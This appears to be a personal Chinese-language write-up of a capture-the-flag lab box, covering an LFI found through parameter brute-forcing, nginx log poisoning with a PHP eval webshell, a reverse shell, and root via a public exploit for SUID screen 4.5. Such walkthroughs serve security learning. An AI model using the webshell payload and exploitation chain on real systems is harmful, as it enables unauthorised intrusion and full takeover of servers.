January 5, 2024 10:44 AM
Tags:screen提权
Owner:只惠摸鱼
探测靶机ip,大概率为192.168.199.135,且开放端口为80和111
扫描端口80,111相关服务、版本、操作系统、漏洞信息
查看80端口的页面,发现有可能有用的就是contact页面,但XSS没反应。
扫一下目录,看有没有其他有用的
发现有一些php页面,大部分是主页里面可见的功能,有一个奇怪的是footer.php 页面刷新或重新进入时,数字会变。
bp抓包,然后进行传参使其等于其中任意页面的php(我是用了index.php),导入Intruder模块准备爆破变量名,找到能够改变页面脚注的变量,从而执行下一步渗透操作。【我的字典是用的别人的英文字母字典,数量还比较大,不是很好用,有大佬有变量名爆破的字典的话跪求分享一下】
根据返回内容的长度,找到传参的变量名是file
使用参数传入/etc/passwd,可以查看用户,/etc/shadow查看用户密码不行,应该是设置了权限
有文件包含漏洞,然后抓包传入一句话木马,一句话木马需要存储在文件才能连接,所以想到nginx的日志进行写入。
访问nginx的日志目录**/var/log/nginx/access.log或/var/log/nginx/error.log**【一开始我始终进不去,怎么搞都没数据,重启靶机后还是一样,发现爆500,搜了搜感觉应该是我爆破时没有设置线程,打崩了nginx服务器,或者扫目录时扫太多了,内容太多错误了。不得以重新安装一遍。0~0】
写入马后访问error.log,发现马已写入,尝试蚁剑连接(当然也可以访问url写马,然后看access.log即/<?php @eval($_REQUEST[cmd]);?>
蚁剑连接
反弹shell,进行提权操作
生成交互性shell
python -c 'import pty;pty.spawn(“/bin/bash”)’
www-data权限较低,尝试寻找suid文件进行提权
发现有一个screen,搜索一下screen提权
searchsploit 搜索screen 4.5提权漏洞
下载到本地,之后拖到桌面备用
通过蚁剑上传到/tmp/文件夹
修改文件权限 chmod 777 41154.sh
直接本地反弹shell处运行脚本,一气呵成拿到root
msf反弹shell也可以
生成后门文件
蚁剑上传
msf模块进行监听
给予权限并运行
拿到后上传脚本,修改文件权限并运行
读取/root目录下的flag。GG!